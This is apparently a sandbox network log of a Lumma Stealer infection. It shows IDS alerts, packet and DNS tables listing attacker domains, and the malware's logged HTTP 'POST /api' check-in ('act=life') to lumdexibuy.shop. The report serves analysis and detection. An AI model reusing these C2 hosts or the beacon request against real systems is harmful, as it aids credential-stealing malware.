                                                                                                                                      2024-11-29T15:12:45.509385+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549775104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:12:49.811182+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549786104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:12:54.229858+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549797104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:12:58.720720+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549809104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:13:02.934746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549819104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:13:05.438371+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549819104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:13:06.798162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549826104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:13:11.123645+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549837104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:13:14.067850+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549837104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:13:15.518575+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549848104.20.4.235443TCP
                                                                                                                                      2024-11-29T15:13:18.026067+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549854104.21.58.9443TCP
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 29, 2024 15:12:35.838872910 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:35.838897943 CET44349754104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:35.838977098 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:35.840168953 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:35.840182066 CET44349754104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:37.057482004 CET44349754104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:37.057574987 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:37.061446905 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:37.061455011 CET44349754104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:37.061677933 CET44349754104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:37.108478069 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:37.109428883 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:37.109457016 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:37.109488010 CET44349754104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:39.594079018 CET44349754104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:39.594161987 CET44349754104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:39.594288111 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:39.596088886 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:39.596100092 CET44349754104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:39.596117973 CET49754443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:39.596122980 CET44349754104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:39.640892029 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:39.640917063 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:39.641021967 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:39.641318083 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:39.641329050 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:40.949135065 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:40.949212074 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:40.950412035 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:40.950422049 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:40.950623035 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:40.951803923 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:40.951833963 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:40.951864004 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.897701025 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.897744894 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.897772074 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.897810936 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:43.897819996 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.897871971 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:43.897876024 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.906193972 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.906244993 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:43.906249046 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.914602995 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.914653063 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:43.914657116 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.923010111 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.923063993 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:43.923069954 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:43.968008041 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.017822027 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.061605930 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.108505964 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.108562946 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.108639002 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.108690977 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.109556913 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.109561920 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.109580994 CET49764443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.109584093 CET44349764104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.297849894 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.297869921 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:44.297967911 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.298301935 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:44.298310995 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:45.509279013 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:45.509385109 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:45.510791063 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:45.510802984 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:45.511051893 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:45.512296915 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:45.512466908 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:45.512501001 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:48.395212889 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:48.395291090 CET44349775104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:48.395610094 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:48.395653009 CET49775443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:48.505635977 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:48.505660057 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:48.505783081 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:48.506244898 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:48.506256104 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:49.811028957 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:49.811182022 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:49.813070059 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:49.813076019 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:49.813293934 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:49.814606905 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:49.814759970 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:49.814785004 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:49.814848900 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:49.855335951 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:52.703653097 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:52.703742981 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:52.703839064 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:52.704005957 CET49786443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:52.704020023 CET44349786104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:52.926359892 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:52.926397085 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:52.926477909 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:52.926821947 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:52.926836967 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:54.229733944 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:54.229857922 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:54.231275082 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:54.231281996 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:54.231498957 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:54.232964993 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:54.233153105 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:54.233180046 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:54.233247995 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:54.233253956 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:57.316625118 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:57.316705942 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:57.316797018 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:57.317084074 CET49797443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:57.317101002 CET44349797104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:57.456836939 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:57.456876040 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:57.456974983 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:57.457307100 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:57.457312107 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:58.720643044 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:58.720720053 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:58.722843885 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:58.722857952 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:58.723098993 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:58.724425077 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:58.724653959 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:58.724685907 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:01.585036993 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:01.585110903 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:01.585160017 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:01.585350037 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:01.585361958 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:01.638031960 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:01.638061047 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:01.638140917 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:01.638571024 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:01.638588905 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:02.934623003 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:02.934746027 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:02.936139107 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:02.936146021 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:02.936381102 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:02.937721968 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:02.937818050 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:02.937822104 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:05.438390970 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:05.438478947 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:05.438594103 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:05.438802958 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:05.438816071 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:05.538002968 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:05.538039923 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:05.538156033 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:05.538547039 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:05.538558960 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:06.798089981 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:06.798161983 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:06.816840887 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:06.816854954 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:06.817086935 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:06.832802057 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:06.832870960 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:06.832876921 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:09.780545950 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:09.780627966 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:09.780700922 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:09.886519909 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:09.886539936 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:09.910219908 CET49837443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:09.910243988 CET44349837104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:09.910309076 CET49837443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:09.911117077 CET49837443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:09.911128998 CET44349837104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:11.123500109 CET44349837104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:11.123645067 CET49837443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:11.125252008 CET49837443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:11.125264883 CET44349837104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:11.125528097 CET44349837104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:11.128290892 CET49837443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:11.128310919 CET49837443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:11.128381968 CET44349837104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:14.067853928 CET44349837104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:14.067960978 CET44349837104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:14.068025112 CET49837443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:14.068192959 CET49837443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:14.068218946 CET44349837104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:14.068229914 CET49837443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:14.068236113 CET44349837104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:14.209543943 CET49848443192.168.2.5104.20.4.235
                                                                                                                                      Nov 29, 2024 15:13:14.209592104 CET44349848104.20.4.235192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:14.209708929 CET49848443192.168.2.5104.20.4.235
                                                                                                                                      Nov 29, 2024 15:13:14.210062027 CET49848443192.168.2.5104.20.4.235
                                                                                                                                      Nov 29, 2024 15:13:14.210077047 CET44349848104.20.4.235192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:15.518345118 CET44349848104.20.4.235192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:15.518574953 CET49848443192.168.2.5104.20.4.235
                                                                                                                                      Nov 29, 2024 15:13:15.520637035 CET49848443192.168.2.5104.20.4.235
                                                                                                                                      Nov 29, 2024 15:13:15.520657063 CET44349848104.20.4.235192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:15.520914078 CET44349848104.20.4.235192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:15.522264957 CET49848443192.168.2.5104.20.4.235
                                                                                                                                      Nov 29, 2024 15:13:15.567326069 CET44349848104.20.4.235192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:16.179316998 CET44349848104.20.4.235192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:16.179420948 CET44349848104.20.4.235192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:16.179538965 CET49848443192.168.2.5104.20.4.235
                                                                                                                                      Nov 29, 2024 15:13:16.179790974 CET49848443192.168.2.5104.20.4.235
                                                                                                                                      Nov 29, 2024 15:13:16.179811001 CET44349848104.20.4.235192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:16.179825068 CET49848443192.168.2.5104.20.4.235
                                                                                                                                      Nov 29, 2024 15:13:16.179831028 CET44349848104.20.4.235192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:16.761940956 CET49854443192.168.2.5104.21.58.9
                                                                                                                                      Nov 29, 2024 15:13:16.762006998 CET44349854104.21.58.9192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:16.762094975 CET49854443192.168.2.5104.21.58.9
                                                                                                                                      Nov 29, 2024 15:13:16.762464046 CET49854443192.168.2.5104.21.58.9
                                                                                                                                      Nov 29, 2024 15:13:16.762487888 CET44349854104.21.58.9192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:18.025980949 CET44349854104.21.58.9192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:18.026067019 CET49854443192.168.2.5104.21.58.9
                                                                                                                                      Nov 29, 2024 15:13:18.101519108 CET49854443192.168.2.5104.21.58.9
                                                                                                                                      Nov 29, 2024 15:13:18.101541042 CET44349854104.21.58.9192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:18.101804018 CET44349854104.21.58.9192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:18.103009939 CET49854443192.168.2.5104.21.58.9
                                                                                                                                      Nov 29, 2024 15:13:18.143338919 CET44349854104.21.58.9192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:18.720861912 CET44349854104.21.58.9192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:18.720931053 CET44349854104.21.58.9192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:18.720980883 CET49854443192.168.2.5104.21.58.9
                                                                                                                                      Nov 29, 2024 15:13:18.721246958 CET49854443192.168.2.5104.21.58.9
                                                                                                                                      Nov 29, 2024 15:13:18.721261024 CET44349854104.21.58.9192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:18.721272945 CET49854443192.168.2.5104.21.58.9
                                                                                                                                      Nov 29, 2024 15:13:18.721277952 CET44349854104.21.58.9192.168.2.5
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 29, 2024 15:12:01.242522955 CET5766053192.168.2.51.1.1.1
                                                                                                                                      Nov 29, 2024 15:12:01.480066061 CET53576601.1.1.1192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:35.437309027 CET6156553192.168.2.51.1.1.1
                                                                                                                                      Nov 29, 2024 15:12:35.832062960 CET53615651.1.1.1192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:14.071378946 CET6498653192.168.2.51.1.1.1
                                                                                                                                      Nov 29, 2024 15:13:14.208622932 CET53649861.1.1.1192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:16.209474087 CET6188353192.168.2.51.1.1.1
                                                                                                                                      Nov 29, 2024 15:13:16.430501938 CET53618831.1.1.1192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:16.438179016 CET6206353192.168.2.51.1.1.1
                                                                                                                                      Nov 29, 2024 15:13:16.760945082 CET53620631.1.1.1192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:18.812175035 CET5164553192.168.2.51.1.1.1
                                                                                                                                      Nov 29, 2024 15:13:19.043142080 CET53516451.1.1.1192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:19.664017916 CET5631953192.168.2.51.1.1.1
                                                                                                                                      Nov 29, 2024 15:13:19.979384899 CET53563191.1.1.1192.168.2.5
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Nov 29, 2024 15:12:01.242522955 CET192.168.2.51.1.1.10xa2f0Standard query (0)GJNYzyvbesUVEaJQoujpar.GJNYzyvbesUVEaJQoujparA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:12:35.437309027 CET192.168.2.51.1.1.10xae11Standard query (0)lumdexibuy.shopA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:14.071378946 CET192.168.2.51.1.1.10x90f5Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:16.209474087 CET192.168.2.51.1.1.10xb87aStandard query (0)cdn1.pixel-story.shopA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:16.438179016 CET192.168.2.51.1.1.10x80ecStandard query (0)silversky.clubA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:18.812175035 CET192.168.2.51.1.1.10xd8bbStandard query (0)masa.r2cloudzugybyi8.shopA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:19.664017916 CET192.168.2.51.1.1.10x661Standard query (0)snowqueen.siteA (IP address)IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Nov 29, 2024 15:12:01.480066061 CET1.1.1.1192.168.2.50xa2f0Name error (3)GJNYzyvbesUVEaJQoujpar.GJNYzyvbesUVEaJQoujparnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:12:35.832062960 CET1.1.1.1192.168.2.50xae11No error (0)lumdexibuy.shop104.21.63.229A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:12:35.832062960 CET1.1.1.1192.168.2.50xae11No error (0)lumdexibuy.shop172.67.172.94A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:14.208622932 CET1.1.1.1192.168.2.50x90f5No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:14.208622932 CET1.1.1.1192.168.2.50x90f5No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:14.208622932 CET1.1.1.1192.168.2.50x90f5No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:16.430501938 CET1.1.1.1192.168.2.50xb87aName error (3)cdn1.pixel-story.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:16.760945082 CET1.1.1.1192.168.2.50x80ecNo error (0)silversky.club104.21.58.9A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:16.760945082 CET1.1.1.1192.168.2.50x80ecNo error (0)silversky.club172.67.167.196A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:19.043142080 CET1.1.1.1192.168.2.50xd8bbName error (3)masa.r2cloudzugybyi8.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 15:13:19.979384899 CET1.1.1.1192.168.2.50x661Name error (3)snowqueen.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      • lumdexibuy.shop
                                                                                                                                      • pastebin.com
                                                                                                                                      • silversky.club
                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.549754104.21.63.2294436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:12:37 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: lumdexibuy.shop
                                                                                                                                      2024-11-29 14:12:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
